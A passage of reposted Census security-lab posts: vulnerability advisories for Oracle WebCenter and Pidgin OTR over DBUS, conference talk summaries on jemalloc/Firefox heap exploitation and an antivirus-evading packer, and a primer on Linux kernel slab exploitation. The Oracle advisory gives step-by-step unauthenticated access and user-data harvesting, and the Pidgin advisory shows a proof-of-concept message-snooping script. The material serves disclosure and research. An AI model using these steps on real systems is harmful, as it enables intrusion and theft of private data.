11117 and 11118 that leads to disclosure of user information Specifically, an unauthenticated attacker can retrieve all information related to the users of the platform via a default user account of the Oracle WebCenter installation This includes usernames, emails, phone numbers and files linked to the users profiles The attack can be achieved via the following steps 1 The attacker visits the following URL on the target Oracle WebCenter installation URL edited for readability http wwwvulnsitecom webcenter faces oracle webcenter page scopedMD s8bba98ff_4cbb_40b8_beee_296c916a23ed businessRolePages UserProfileMainViewjspx immediate true wcusername weblogic 2 The attacker has now gained unauthenticated access to the Oracle WebCenter backend interface as the default user weblogic From the backend interface the attacker may then navigate to the Documents tab 3 In the Filter field the attacker selects Advanced as illustrated in the following screenshot IMAGE 4 The attacker then clicks the binoculars icon next to the Created By field 5 In the search field the attacker enters and retrieves the complete list of the system s usernames along with emails and phone numbers, as shown in the following screenshot IMAGE Moreover, once the list of all valid usernames has been retrieved, an attacker will be able to gain unauthenticated read access to files linked to each user profile on the Oracle WebCenter installation via the following URL edited for readability http wwwvulnsitecom webcenter faces oracle webcenter page scopedMD s8bba98ff_4cbb_40b8_beee_296c916a23ed businessRolePages UserProfileMainViewjspx immediate true wcusername Oracle has responded to this advisory with an update to WebCenter included in the Critical Patch Update Advisory April 2014 Administrators of affected installations are advised to proceed with the Critical Patch Update patch Disclosure Timeline Discovery August 20th, 2013 Vendor Contact August 22nd, 2013 CVE Assignment December 12th, 2013 Public Disclosure April 15th, 2014 http://www.secuobs.com/revue/news/513016.shtmlhttp://www.secuobs.com/revue/news/513016.shtml Secuobs.com : 2014-02-12 16:35:09 - www.census labs.com - Here are the slides for our recent albeit short talk on Secure Mobile App SDLC , as presented at the 4th Infocom Mobiles and Apps conference IMAGE All in all, IMAPPS14 was a great experience and we d like to thank both the organizers and presenters for this treat Keep it up http://www.secuobs.com/revue/news/497477.shtmlhttp://www.secuobs.com/revue/news/497477.shtml Secuobs.com : 2014-02-07 14:38:54 - www.census labs.com - Census will be sponsoring the 4th Infocom Mobiles and Apps conference, that will be held on February 12th, 2014 at the Divani Caravel hotel in Athens, Greece IMAGE At the 10 35 session, Nikos Tsagkarakis will be delivering a presentation entitled Secure Mobile App Development Lifecycle Nikos will be showing how to best integrate security procedures within the SDLC followed by app development groups We hope to see you there http://www.secuobs.com/revue/news/496591.shtmlhttp://www.secuobs.com/revue/news/496591.shtml Secuobs.com : 2013-05-29 21:26:49 - www.census labs.com - We are thrilled to be participating again, for the forth time actually, at AthCon, the leading technical IT security conference in Greece This year, our researchers Patroklos Argyroudis and Chariton Karamitas will be presenting novel exploitation techniques against the Mozilla Firefox browser IMAGE The talk s abstract is the following The Mozilla Firefox web browser has a new memory allocator named jemalloc enabled by default on all supported platforms Windows, OS X, Linux and Android Therefore, the traditional platform-specific heap exploitation techniques like unlinking and frontlinking are no longer applicable when attacking new Firefox heap corruption vulnerabilities In this talk we will develop novel exploitation approaches and primitives that can be used to attack Mozilla Firefox via its new heap manager We will build on our previously published work on this area and include practical hands-on demonstrations of researching Firefox vulnerabilities and developing exploits for them Moreover, we will release an updated and enhanced version of our jemalloc debugging utility unmask_jemalloc If you haven t registered yet, get your AthCon ticket now since today is the last day and there is no onsite registration http://www.secuobs.com/revue/news/448391.shtmlhttp://www.secuobs.com/revue/news/448391.shtml Secuobs.com : 2013-04-03 14:08:53 - www.census labs.com - census will be sponsoring the 3rd InfoCom Security conference, that will be held on April 10th, 2013 at the Divani Caravel hotel in Athens, Greece IMAGE At the 15 00 session, our director of R D Dr Patroklos Argyroudis will be delivering a presentation on How to enhance penetration testing through vulnerability research Don t miss this Also, feel free to visit us at our stand We will be more than happy to meet you and answer any questions you might have about our services, research projects or enhanced penetration testing methodology http://www.secuobs.com/revue/news/437356.shtmlhttp://www.secuobs.com/revue/news/437356.shtml Secuobs.com : 2013-04-03 13:23:32 - www.census labs.com - census participated in the Network Security and Cyberwarfare event organized by the Hellenic Air Force Academy Σχολή Ικάρων IMAGE Our researcher Ioannis Stais provided a gentle introduction to the world of Web Application Firewalls slides in greek while our lead penetration tester Nikos Tsagkarakis gave a talk on Privacy Attacks slides in greek Mr Tsagkarakis also did a followup presentation at the Hellenic Naval Academy on the same subject We would like to cordially thank Professor Antonios Andreatos for inviting us to this great event and the Hellenic Airforce Naval Academies for hosting these talks http://www.secuobs.com/revue/news/437351.shtmlhttp://www.secuobs.com/revue/news/437351.shtml Secuobs.com : 2012-10-31 11:27:43 - www.census labs.com - Census was one of the sponsors at the OWASP AppSec Research 2012 conference, held at the University of Athens, Greece on July 10-12th, 2012 Besides helping out with the CTF challenge, Census researchers also provided a technical talk on Heap Exploitation Abstraction IMAGE We would like to thank Konstantinos Papapanagiotou and the Greek chapter of OWASP for organizing this amazing event and for providing us with a great opportunity to present our work http://www.secuobs.com/revue/news/408747.shtmlhttp://www.secuobs.com/revue/news/408747.shtml Secuobs.com : 2012-08-17 13:18:05 - www.census labs.com - This year s OWASP AppSec Research conference took place in Athens, Greece and we were planning to be there as participants However, the day before the conference, Konstantinos Papapanagiotou General Chair asked if we could do a presentation to replace a cancelled talk Myself and Chariton Karamitas agreed to help and spend around three hours preparing a talk on heap exploitation abstraction, a subject dear to us IMAGE Our talk was titled Heap Exploitation Abstraction by Example and was divided into two main parts In the first part we focused on presenting examples of exploiting heap managers Specifically, we talked about attacking the FreeBSD kernel allocator UMA , the Linux kernel allocator SLUB and the jemalloc userland allocator In the second part we started by finding the common elements of these three allocators and categorizing them into the following End-user allocations Allocation containers Container groupings Execution-specific thread, CPU core metadata We then proceeded to make an argument that the value of abstracting heap exploitation is in having a library of attack techniques, or primitives, that can be reused on other allocators We took the concept of weird machines as defined by Sergey Bratus and Halvar Flake and applied it to heap managers Briefly, we consider an allocator to be a deterministic automaton Metadata corruption attacks can then be viewed as corruptions of the automaton s transition function Application-specific attacks, like adjacent memory region corruptions, can be viewed as manipulations of the automaton s determinacy Please consider this as our early attempt on abstracting heap exploitation also that it was put together in three hours and expect more work on the subject from us Presentation Material Slides pdf Thanks to Sergey Bratus and Halvar Flake for the weird machine concept Chris Valasek, Dimitris Glynos and Yiorgos Adamopoulos for interesting discussions on exploitation abstraction Konstantinos Papapanagiotou for inviting us to replace the cancelled talk http://www.secuobs.com/revue/news/394265.shtmlhttp://www.secuobs.com/revue/news/394265.shtml Secuobs.com : 2012-08-03 12:24:40 - www.census labs.com - This year we have presented our research work at Black Hat USA 2012, the leading information security conference Our researchers Patroklos Argyroudis and Chariton Karamitas visited Caesar s Palace at Las Vegas, Nevada and delivered the talk IMAGE Our presentation was titled Exploiting the jemalloc Memory Allocator Owning Firefox s Heap and described in detail attack primitives against jemalloc and how these can be used to exploit heap overflow and use-after-free vulnerabilities that affect the Mozilla Firefox browser Specifically, the presentation was divided into three parts The first part comprised of an introduction to the jemalloc memory allocator and presented its architecture, its fundamental concepts and its management data structures IMAGE The second part of the presentation focused on identifying attack vectors against the allocator and on the development of novel exploitation approaches and primitives that can be used to attack jemalloc heap corruption vulnerabilities In the third and final part, our researchers applied these primitives to manipulate the heap of the Mozilla Firefox browser and to develop a PoC exploit for vulnerability CVE-2011-3026 demonstrated on Firefox Furthermore, a utility unmask_jemalloc was released that can be used to aid the process of exploit development for jemalloc Firefox vulnerabilities Updated Presentation Material All material from our presentation are provided below in the hope that they will be useful to security researchers willing to continue our work Slides bhusa-2012-slidespdf Code archive bhusa-2012-srctargz The development of the released code and utilities will continue on GitHub at the following repositories unmask_jemalloc jemalloc_feng_shui cve-2011-3026-firefox lipodebugwalk See you at the next security conference http://www.secuobs.com/revue/news/391481.shtmlhttp://www.secuobs.com/revue/news/391481.shtml Secuobs.com : 2012-06-07 15:53:49 - www.census labs.com - IMAGE census researchers will be presenting Exploiting the jemalloc Memory Allocator Owning Firefox s Heap , an in-depth security analysis of the jemalloc memory allocator at Black Hat USA 2012 The focus will be on offensive techniques and the identification of attack vectors, while the Mozilla Firefox browser will be used as a case study The Black Hat USA 2012 conference will be held in Las Vegas, Nevada We hope to see you there http://www.secuobs.com/revue/news/380134.shtmlhttp://www.secuobs.com/revue/news/380134.shtml Secuobs.com : 2012-05-14 22:12:11 - www.census labs.com - Continuing our work on jemalloc exploitation, myself and Chariton Karamitas intern at Census Inc are presenting Owning Firefox s Heap at Black Hat USA 2012 This presentation extends our recently published Phrack paper by focusing specifically on the most widely used jemalloc application, namely the Mozilla Firefox web browser IMAGE The abstract of our talk will give you a good preview of the content jemalloc is a userland memory allocator that is being increasingly adopted by software projects as a high performance heap manager It is used in Mozilla Firefox for the Windows, Mac OS X and Linux platforms, and as the default system allocator on the FreeBSD and NetBSD operating systems Facebook also uses jemalloc in various components to handle the load of its web services However, despite such widespread use, there is no work on the exploitation of jemalloc Our research addresses this We will begin by examining the architecture of the jemalloc heap manager and its internal concepts, while focusing on identifying possible attack vectors jemalloc does not utilize concepts such as unlinking or frontlinking that have been used extensively in the past to undermine the security of other allocators Therefore, we will develop novel exploitation approaches and primitives that can be used to attack jemalloc heap corruption vulnerabilities As a case study, we will investigate Mozilla Firefox and demonstrate the impact of our developed exploitation primitives on the browser s heap In order to aid the researchers willing to continue our work, we will also release our jemalloc debugging tool belt For updates on this talk, information on my research and my work at Census, Inc in general you can follow me on Twitter http://www.secuobs.com/revue/news/375474.shtmlhttp://www.secuobs.com/revue/news/375474.shtml Secuobs.com : 2012-05-07 18:33:59 - www.census labs.com - AthCon 2012 is now over and what a great event that was IMAGE My talk this year, entitled Packing Heat , described ways in which PE executables can be packed to evade AntiVirus AV detection during penetration tests Specifically, the talk presented a new type of packer a packer that generates metamorphic executables Each executable generated by this type of packer both looks different on-disk and behaves differently at runtime The presentation went on to explain how to build such a packer today, in 9 easy steps This was followed by a live demo of a prototype implementation and an evaluation of its generated output against the AV engines provided by VirusTotal The talk concluded with a discussion on static dynamic analysis techniques that could prove useful during the automatic analysis of metamorphic malicious executables Below you may find the presentation slides Presentation slides pdf I would like to thank the AthCon staff and sponsors for making this event possible, but also IOActive for throwing such a cool after-party http://www.secuobs.com/revue/news/374115.shtmlhttp://www.secuobs.com/revue/news/374115.shtml Secuobs.com : 2012-04-27 16:26:35 - www.census labs.com - census is excited to be participating for the third time at AthCon, the leading technical IT security conference in Greece This year, our researcher Dimitris Glynos will be presenting a new design for executable packing that allows penetration testers to hide malicious payloads from a wide variety of antivirus engines IMAGE In his talk, entitled Packing Heat , Dimitris will explain how antiviruses currently work, why it is now easier to create metamorphic executables that evade AV detection, how to go about building such a metamorphic packer and finally, what features future antiviruses need to have to compensate for this type of evasion technique If you haven t registered yet, order your ticket today http://www.secuobs.com/revue/news/372425.shtmlhttp://www.secuobs.com/revue/news/372425.shtml Secuobs.com : 2012-02-26 12:28:07 - www.census labs.com - census ID census-2012-0001 CVE ID CVE-2012-1257 Affected Products libpurple versions 2101 , libpurple clients with DBUS support incl pidgin versions 2101 , pidgin-otr versions 320 Class Information Exposure CWE-200 , Privacy Violation CWE-359 , Information Exposure Through Sent Data CWE-201 , Intentional Information Exposure CWE-213 Remote No Discovered by Dimitris Glynos libpurple-based applications transmit OTR off-the-record conversations over DBUS in plaintext This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account Details libpurple is an Instant Messaging IM library developed by the Pidgin project It is used by a number of IM clients including Pidgin and Adium libpurple-based clients support the OTR Off-the-Record protocol either natively or via a plugin The OTR messaging protocol enables users to communicate securely over any IM network If libpurple is compiled with DBUS support and there is a DBUS session daemon running on the system, then all messages passing through libpurple are broadcasted over DBUS The reason behind this is to allow for third party applications, such as desktop widgets to process these messages eg create an animation when a message arrives However, among the messages transmitted over DBUS one also finds the plaintext form of OTR conversations This is a security problem, as the private OTR messages may leak to other unrelated processes that are executing under the same user as the libpurple-based application Exploitation Notes For the purpose of explaining the impact of this bug we will focus on a popular libpurple-based application, Pidgin To snoop in on a Pidgin user s conversation a remote attacker would need to connect to the DBUS daemon that is responsible for the user s session There are at least two ways to achieve this The first one is to exploit an application that runs within the same desktop session as Pidgin This application would have inherited the necessary DBUS_SESSION_BUS_ADDRESS environmental variable and will thus be able to connect to the DBUS daemon over a unix socket without a problem The second way is to compromise the user s account in some way and steal the DBUS_SESSION_BUS_ADDRESS value from one of the desktop processes through proc environ which is accessible to processes of the same owner Using this value, the attacker will now be able to connect to DBUS with applications that are not part of the desktop session Please note that the above methods do not require any control over the Pidgin process ptrace or other pidgin-otr-snoopingpy is a proof-of-concept Python script that connects to DBUS and prints all messages received via Pidgin s ReceivedImMsg and WroteImMsg signals The example below shows messages transmitted during an OTR conversation user host python pidgin-otr-snoopingpy sent 'hey' to user1 examplecom received 'ho' from user1 examplecom sent 'lets go ' to user1 examplecom Discussion A possible way to fix this issue is for libpurple to support a new type of messages, ie private messages Most if not all communication primitives in libpurple use a flags parameter of type PurpleMessageFlags to qualify the type of message being transmitted received The example below shows the prototype of such a communication function from pidgin-2101 libpurple serverc md5 2e5f2d2ec90dedba416ced1ee9759e1f The PurpleMessageFlags type is defined in pidgin-2101 libpurple conversationh as follows 105 typedef enum 106 107 PURPLE_MESSAGE_SEND 0x0001, 108 PURPLE_MESSAGE_RECV 0x0002, 109 PURPLE_MESSAGE_SYSTEM 0x0004, 110 PURPLE_MESSAGE_AUTO_RESP 0x0008, 111 PURPLE_MESSAGE_ACTIVE_ONLY 0x0010, 118 PURPLE_MESSAGE_NICK 0x0020, 119 PURPLE_MESSAGE_NO_LOG 0x0040, 120 PURPLE_MESSAGE_WHISPER 0x0080, 121 PURPLE_MESSAGE_ERROR 0x0200, 122 PURPLE_MESSAGE_DELAYED 0x0400, 123 PURPLE_MESSAGE_RAW 0x0800, 125 PURPLE_MESSAGE_IMAGES 0x1000, 126 PURPLE_MESSAGE_NOTIFY 0x2000, 127 PURPLE_MESSAGE_NO_LINKIFY 0x4000, 129 PURPLE_MESSAGE_INVISIBLE 0x8000 130 PurpleMessageFlags This enumeration could be extended to include a new type for private messages Private messages should by default not be logged by applications or be broadcasted over DBUS Updates The Pidgin libpurple development team has acknowledged this issue and is planning to address it On a related note, Nadim Kobeissi has reported a similar leak in Adium Apparently Adium forwards OTR plaintexts to the Growl notification system which by default keeps them in its notification history Disclosure Timeline Vendor Contact s December 20th, 2011 1, 2, 3 CVE assignment February 21st, 2012 Public Disclosure February 25th, 2012 Acknowledgements We would like to thank Pidgin developer Peter Lawler for his helpful comments http://www.secuobs.com/revue/news/359953.shtmlhttp://www.secuobs.com/revue/news/359953.shtml Secuobs.com : 2012-02-25 17:23:43 - www.census labs.com - census ID census-2012-0001 CVE ID CVE-2012-1257 Affected Products All versions of pidgin 2101 and pidgin-otr 320 on systems that support DBUS Class Information Exposure CWE-200 , Privacy Violation CWE-359 , Information Exposure Through Sent Data CWE-201 , Intentional Information Exposure CWE-213 Remote No Discovered by Dimitris Glynos Pidgin transmits OTR off-the-record conversations over DBUS in plaintext This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account Details Pidgin is a popular Instant Messenger application that runs on a wide variety of platforms including Windows and Linux The pidgin-otr plugin enables users to communicate securely over any Instant Messenger network using the Off-the-record messaging protocol If Pidgin is compiled with DBUS support and there is a DBUS session daemon running on the system, then all messages that are typed into Pidgin and messages received through Pidgin are broadcasted on DBUS The reasoning behind this is to allow for third party applications, such as desktop widgets to process these messages eg create an animation when a message arrives However, among the messages transmitted over DBUS one also finds the plaintext form of OTR conversations This is a security problem, as the private OTR messages may leak to other unrelated processes that are executing with the Pidgin user s rights To snoop in on a Pidgin user s conversation a remote attacker needs to connect to the DBUS daemon that is responsible for the user s session There are at least two ways to achieve this The first one is to exploit an application that runs within the same desktop session as Pidgin This application will have inherited the necessary DBUS_SESSION_BUS_ADDRESS environmental variable and will be able to connect to the DBUS daemon over a unix socket without a problem The second way is to compromise the user s account in some way and steal the DBUS_SESSION_BUS_ADDRESS value from one of the desktop processes through proc environ which is accessible to processes of the same owner Using this value, the attacker will now be able to connect to DBUS with applications that are not part of the desktop session Please note that the above methods do not require any control over the Pidgin process ptrace or other pidgin-otr-snoopingpy is a proof-of-concept Python script that connects to DBUS and prints all messages received via Pidgin s ReceivedImMsg and WroteImMsg signals The example below shows messages transmitted during an OTR conversation user host python pidgin-otr-snoopingpy sent 'hey' to user1 examplecom received 'ho' from user1 examplecom sent 'lets go ' to user1 examplecom A possible way to fix this issue is for Pidgin to support a new type of messages, ie private messages Most if not all communication primitives in Pidgin use a flags parameter of type PurpleMessageFlags to qualify the type of message being transmitted received The example below shows the prototype of such a communication function from pidgin-2101 libpurple serverc 557 void serv_got_im PurpleConnection gc, const char who, const char msg, 558 PurpleMessageFlags flags, time_t mtime The PurpleMessageFlags type is defined in pidgin-2101 libpurple conversationh as follows 105 typedef enum 106 107 PURPLE_MESSAGE_SEND 0x0001, 108 PURPLE_MESSAGE_RECV 0x0002, 109 PURPLE_MESSAGE_SYSTEM 0x0004, 110 PURPLE_MESSAGE_AUTO_RESP 0x0008, 111 PURPLE_MESSAGE_ACTIVE_ONLY 0x0010, 118 PURPLE_MESSAGE_NICK 0x0020, 119 PURPLE_MESSAGE_NO_LOG 0x0040, 120 PURPLE_MESSAGE_WHISPER 0x0080, 121 PURPLE_MESSAGE_ERROR 0x0200, 122 PURPLE_MESSAGE_DELAYED 0x0400, 123 PURPLE_MESSAGE_RAW 0x0800, 125 PURPLE_MESSAGE_IMAGES 0x1000, 126 PURPLE_MESSAGE_NOTIFY 0x2000, 127 PURPLE_MESSAGE_NO_LINKIFY 0x4000, 129 PURPLE_MESSAGE_INVISIBLE 0x8000 130 PurpleMessageFlags This enumeration could be extended to include a new type for private messages Private messages should by default not be logged or be broadcasted over DBUS The Pidgin developer team has been contacted about this issue and we hope that they will address it either in their next release or during their planned privacy enhancement update Disclosure Timeline Vendor Contact s December 20th, 2011 1, 2, 3 CVE assignment February 21st, 2012 Public Disclosure February 25th, 2012 http://www.secuobs.com/revue/news/359912.shtmlhttp://www.secuobs.com/revue/news/359912.shtml Secuobs.com : 2012-01-04 11:52:31 - www.census labs.com - census will be participating in the Digi-Mobile action as a provider for smart phone software and services If you require a secure remote management solution for your corporate assets or a specialized security intelligence platform that fully utilizes today s smart-phone tablet technologies, then contact us today IMAGE The Digi-Mobile Action funds greek companies that wish to integrate smart phone technologies into their businesses and products To see if your business is eligible for participation to this action, please visit the Digi-Mobile portal or the relevant StartupGreece site http://www.secuobs.com/revue/news/350209.shtmlhttp://www.secuobs.com/revue/news/350209.shtml Secuobs.com : 2012-01-03 10:58:27 - www.census labs.com - In anticipation of Dan Rosenberg s talk on exploiting the Linux kernel s SLOB memory allocator at the Infiltrate security conference and because I recently had a discussion with some friends about the different kernel memory allocators in Linux, I decided to write this quick introduction I will present some of the allocators characteristics and also provide references to public work on exploitation techniques IMAGE At the time of this writing, the Linux kernel has three different memory allocators in the official code tree, namely SLAB, SLUB and SLOB These allocators are on a memory management layer that is logically on top of the system s low level page allocator and are mutually exclusive ie you can only have one of them enabled compiled in your kernel They are used when a kernel developer calls kmalloc or a similar function Unsurprisingly, they can all be found in the mm directory All of them follow, to various extends and by extending or simplifying, the traditional slab allocator design notice the lowercase slab that s the term for the general allocator design approach, while SLAB is a slab implementation in the Linux kernel Slab allocators allocate prior to any request, for example at kernel boot time, large areas of virtual memory called slabs , hence the name Each one of these slabs is then associated to a kernel structure of a specific type and size Furthermore, each slab is divided into the appropriate number of slots for the size of the kernel structure it is associated with As an example consider that a slab for the structure task_struct has 31 slots The size of a task_struct is 1040 bytes, so assuming that a page is 4096 bytes the default then a task_struct slab is 8 pages long Apart from the structure-specific slabs, like the one above for task_struct, there are also the so called general purpose slabs which are used to serve arbitrary-sized kmalloc requests These requests are adjusted by the allocator for alignment and assigned to a suitable slab Let s take a look at the slabs of a recent Linux kernel cat proc slabinfo slabinfo version 21 fat_inode_cache 57 57 416 19 2 tunables 0 0 0 slabdata 3 3 0 fat_cache 170 170 24 170 1 tunables 0 0 0 slabdata 1 1 0 VMBlockInodeCache 7 7 4480 7 8 tunables 0 0 0 slabdata 1 1 0 blockInfoCache 0 0 4160 7 8 tunables 0 0 0 slabdata 0 0 0 AF_VMCI 0 0 704 23 4 tunables 0 0 0 slabdata 0 0 0 fuse_request 80 80 400 20 2 tunables 0 0 0 slabdata 4 4 0 fuse_inode 21299 21690 448 18 2 tunables 0 0 0 slabdata 1205 1205 0 kmalloc-8192 94 96 8192 4 8 tunables 0 0 0 slabdata 24 24 0 kmalloc-4096 118 128 4096 8 8 tunables 0 0 0 slabdata 16 16 0 kmalloc-2048 173 208 2048 16 8 tunables 0 0 0 slabdata 13 13 0 kmalloc-1024 576 640 1024 16 4 tunables 0 0 0 slabdata 40 40 0 kmalloc-512 904 992 512 16 2 tunables 0 0 0 slabdata 62 62 0 kmalloc-256 540 976 256 16 1 tunables 0 0 0 slabdata 61 61 0 kmalloc-128 946 1408 128 32 1 tunables 0 0 0 slabdata 44 44 0 kmalloc-64 13013 13248 64 64 1 tunables 0 0 0 slabdata 207 207 0 kmalloc-32 23624 27264 32 128 1 tunables 0 0 0 slabdata 213 213 0 kmalloc-16 3546 3584 16 256 1 tunables 0 0 0 slabdata 14 14 0 kmalloc-8 4601 4608 8 512 1 tunables 0 0 0 slabdata 9 9 0 kmalloc-192 3659 4620 192 21 1 tunables 0 0 0 slabdata 220 220 0 kmalloc-96 10137 11340 96 42 1 tunables 0 0 0 slabdata 270 270 0 kmem_cache 32 32 128 32 1 tunables 0 0 0 slabdata 1 1 0 kmem_cache_node 256 256 32 128 1 tunables 0 0 0 slabdata 2 2 0 Here you can see structure-specific slabs, for example fuse_inode, and general purpose slabs, for example kmalloc-96 When it comes to the exploitation of overflow bugs in the context of slab allocators, there are three general approaches to corrupt kernel memory Corruption of the adjacent objects structures of the same slab Corruption of the slab allocator s management structures referred to as metadata Corruption of the adjacent physical page of the slab your vulnerable structure is allocated on The ultimate goal of the above approaches is of course to gain control of the kernel s execution flow and divert hijack it to your own code In order to be able to manipulate the allocator and the state of its slabs, arranging structures on them to your favor ie next to each other on the same slab, or at the end of a slab , it is nice but not strictly required to have some information on the allocator s state The proc filesystem provides us with a way to get this information Unprivileged local users can simply cat proc slabinfo as shown above and see the allocator s slabs, the number of used free structures on them, etc Is your distribution still allowing this For each one of the Linux kernel s allocators I will provide references to papers describing practical attack techniques and examples of public exploits SLAB Starting with the oldest of the three allocators, SLAB organizes physical memory frames in caches Each cache is responsible for a specific kernel structure Also, each cache holds slabs that consist of contiguous pages and these slabs are responsible for the actual storing of the kernel structures of the cache s type A SLAB s slab can have both allocated in use and deallocated free slots Based on this and with the goal of reducing fragmentation of the system s virtual memory, a cache s slabs are divided into three lists a list with full slabs ie slabs with no free slots , a list with empty slabs slabs on which all slots are free , and a list with partial slabs slabs that have slots both in use and free A SLAB s slab is described by the following structure struct slab union struct struct list_head list unsigned long colouroff void s_mem including colour offset unsigned int inuse num of objs active in slab kmem_bufctl_t free unsigned short nodeid struct slab_rcu __slab_cover_slab_rcu The list variable is used to place the slab in one of the lists I described above Coloring and the variable colouroff require some explanation in case you haven t seen them before Coloring or cache coloring is a performance trick to reduce processor L1 cache hits This is accomplished by making sure that the first slot of a slab which is used to store the slab s slab structure, ie the slab s metadata is not placed at the beginning of the slab which is also at the start of a page but an offset colouroff from it s_mem is a pointer to the first slot of the slab that stores an actual kernel structure object free is an index to the next free object of the slab As I mentioned in the previous paragraph, a SLAB s slab begins with a slab structure the slab s metadata and is followed by the slab s objects The stored objects on a slab are contiguous, with no metadata in between them, making easier the exploitation approach of corrupting adjacent objects Easier means that when we overflow from one object to its adjacent we don t corrupt management data that could lead to making the system crash By manipulating SLAB through controlled allocations and deallocations from userland that affect the kernel for example via system calls we can arrange that the overflow from a vulnerable structure will corrupt an adjacent structure of our own choosing The fact that SLAB s allocations and deallocations work in a LIFO manner is of course to our advantage in arranging structures objects on the slabs As qobaiashi has presented in his paper The story of exploiting kmalloc overflows , the system calls semget and semctl , , IPC_RMID is one way to make controlled allocations and deallocations respectively The term controlled here refers to both the size of the allocation deallocation and the fact that we can use them directly from userland Another requirement that these system calls satisfy is that the structure they allocate can help us in our quest for code execution when used as a victim object and corrupted from a vulnerable object Other ways system calls that satisfy all the above requirements do exist Another resource on attacking SLAB is Exploiting kmalloc overflows to 0wn j00 by amnesia and clflush In that presentation the authors explained the development process for a reliable exploit for vulnerability CVE-2004-0424 which was an integer overflow leading to a kernel heap buffer overflow found by ihaquer and cliph Both the presentation and the exploit are not public as far as I know However, a full exploit was published by twiz and sgrakkyu in Phrack 64 castityc SLUB SLUB is currently the default allocator of the Linux kernel It follows the SLAB allocator I have already described in its general design caches, slabs, full empty partial lists of slabs, etc , however it has introduced simplifications in respect to management overhead to achieve better performance One of the main differences is that SLUB has no metadata at the beginning of each slab like SLAB, but instead it has added it s metadata variables in the Linux kernel s page structure to track the allocator s data on the physical pages The following excerpt includes only the relevant parts of the page structure, see here for the complete version struct page struct union pgoff_t index Our offset within mapping void freelist slub first free object struct unsigned inuse 16 unsigned objects 15 unsigned frozen 1 union struct kmem_cache slab SLUB Pointer to slab Since there are no metadata on the slab itself, a page s freelist pointer is used to point to the first free object of the slab A free object of a slab has a small header with metadata that contain a pointer to the next free object of the slab The index variable holds the offset to these metadata within a free object inuse and objects hold respectively the allocated and total number of objects of the slab frozen is a flag that specifies whether the page can be used by SLUB s list management functions Specifically, if a page has been frozen by a CPU core, only this core can retrieve free objects from the page, while the other available CPU cores can only add free objects to it The last interesting for our discussion variable is slab which is of type struct kmem_cache and is a pointer to the slab on the page The function on_freelist is used by SLUB to determine if a given object is on a given page s freelist and provides a nice introduction to the use of the above elements The following snippet is an example invocation of on_freelist taken from here slab_lock page if on_freelist page-slab, page, object object_err page-slab, page, object, Object is on free-list rv false else rv true slab_unlock page Locking is required to avoid inconsistencies since on_freelist makes some modifications and it could be interrupted Let s take a look at an excerpt from on_freelist the full version is here static int on_freelist struct kmem_cache s, struct page page, void search int nr 0 void fp void object NULL unsigned long max_objects fp page-freelist while fp nr objects if fp search return 1 if check_valid_pointer s, page, fp if object object_err s, page, object, Freechain corrupt set_freepointer s, object, NULL break else slab_err s, page, Freepointer corrupt page-freelist NULL page-inuse page-objects slab_fix s, Freelist cleared return 0 break object fp fp get_freepointer s, object nr The function starts with a simple piece of code that walks the freelist and demonstrates the use of SLUB internal variables Of particular interest is the call of the check_valid_pointer function which verifies that a freelist s object s address variable fp is within a slab page This is a check that safeguards against corruptions of the freelist This brings us to attacks against the SLUB memory allocator The attack vector of corrupting adjacent objects on the same slab is fully applicable to SLUB and largely works like in the case of the SLAB allocator However, in the case of SLUB there is an added attack vector exploiting the allocator s metadata the ones responsible for finding the next free object on the slab As twiz and sgrakkyu have demonstrated in their book on kernel exploitation, the slab can be misaligned by corrupting the least significant byte of the metadata of a free object that hold the pointer to the next free object This misalignment of the slab allows us to create an in-slab fake object and by doing so to a satisfy safeguard checks as the one I explained in the previous paragraph when they are used, and b to hijack the kernel s execution flow to our own code An example of SLUB metadata corruption and slab misalignment is the exploit for vulnerability CVE-2009-1046 which was an off-by-two kernel heap overflow In this blog post, sgrakkyu explained how by using only an one byte overflow turned this vulnerability into a reliable exploit tiocl_houdinic If you re wondering why an one byte overflow is more reliable than a two byte overflow think about little-endian representation A public example of corrupting adjacent SLUB objects is the exploit i-can-haz-modhardenc by Jon Oberheide for vulnerability CVE-2010-2959 discovered by Ben Hawkes In this blog post you can find an overview of the exploit and the technique SLOB Finally, SLOB is a stripped down kernel allocator implementation designed for systems with limited amounts of memory, for example embedded versions distributions of Linux In fact its design is closer to traditional userland memory allocators rather than the slab allocators SLAB and SLUB SLOB places all objects structures on pages arranged in three linked lists, for small, medium and large allocations Small are the allocations of size less than SLOB_BREAK1 256 bytes , medium those less than SLOB_BREAK2 1024 bytes , and large are all the other allocations define SLOB_BREAK1 256 define SLOB_BREAK2 1024 static LIST_HEAD free_slob_small static LIST_HEAD free_slob_medium static LIST_HEAD free_slob_large Of course this means that in SLOB we can have objects structures of different types and sizes on the same page This is the main difference between SLOB and SLAB SLUB A SLOB page is defined as follows struct slob_page union struct unsigned long flags mandatory atomic_t _count mandatory slobidx_t units free units left in page unsigned long pad 2 slob_t free first free slob_t in page struct list_head list linked list of free pages struct page page The function slob_alloc is SLOB s main allocation routine and based on the requested size it walks the appropriate list trying to find if a page of the list has enough room to accommodate the new object structure the full function is here static void slob_alloc size_t size, gfp_t gfp, int align, int node struct slob_page sp struct list_head prev struct list_head slob_list slob_t b NULL unsigned long flags if size SLOB_BREAK1 slob_list else if size SLOB_BREAK2 slob_list else slob_list list_for_each_entry sp, slob_list, list I think this is a good place to stop since I don't want to go into too many details and because I really look forward to Dan Rosenberg's talk Notes Wrapping this post up, I would like to mention that there are other slab allocators proposed and implemented for Linux apart from the above three SLQB and SLEB come to mind, however as the benevolent dictator has ruled they are not going to be included in the mainline Linux kernel tree until one of the existing three has been removed Exploitation techniques and methodologies like the ones I mentioned in this post can be very helpful when you have a vulnerability you're trying to develop a reliable exploit for However, you should keep in mind that every vulnerability has its own set of requirements and conditions and therefore every exploit is a different story learning experience Understanding a bug and actually developing an exploit for it are two very different things Thanks to Dan and Dimitris for their comments References The following resources were not linked directly in the discussion, but would be helpful in case you want to look more into the subject http lxrlinuxno linux v316 http lwnnet Articles 229984 http lwnnet Articles 311502 http lwnnet Articles 229096 http phrackorg issueshtml issue 66 id 15 article http phrackorg issueshtml issue 66 id 8 article http://www.secuobs.com/revue/news/350010.shtmlhttp://www.secuobs.com/revue/news/350010.shtml Secuobs.com : 2011-10-03 12:11:48 - www.census labs.com - census ID census-2011-0001 CVE ID CVE-2011-3340 Affected Products Netvolution v258 ASP Other versions may also be vulnerable Class Improper Neutralization of Special Elements used in an SQL Command SQL Injection CWE-89 Remote Yes Discovered by Patroklos Argyroudis Researched and 